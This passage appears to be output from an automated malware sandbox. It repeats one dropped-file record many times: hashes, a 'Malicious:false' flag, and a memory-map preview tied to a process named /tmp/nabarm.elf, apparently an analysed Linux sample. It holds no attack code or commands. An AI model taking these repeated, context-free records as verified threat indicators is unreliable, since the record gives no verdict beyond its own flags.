            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
            Preview:8000-12000 r-xp 00000000 fd:00 531566 /tmp/..19000-1a000 rw-p 00009000 fd:00 531566 /tmp/..1a000-1c000 rw-p 00000000 00:00 0 .1c000-1d000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
            Process:/tmp/nabarm.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):283
            Entropy (8bit):3.221133562556156
            Encrypted:false
            SSDEEP:6:+gcCpOj/VC5sceGb/VrppvCY/VjmsVot/VOArB/VH:+9CcyeGjUl
            MD5:3ABCA52F4468223D4736582D62911C12
            SHA1:3B146706E103267C49DA20D7755D11068671B142
            SHA-256:16D702931A547E7D5FB84C1327D3862A5BB0464902C090C15B7645E432FD3131
            SHA-512:C853E55994900620740B4FDAA22B0FE49F91320F649F30182BE18A548C9BF5F2215BD8CB048E48C326E115BAB81179849E9BDFD92D4D52D464D3A50AEFE88800
            Malicious:false
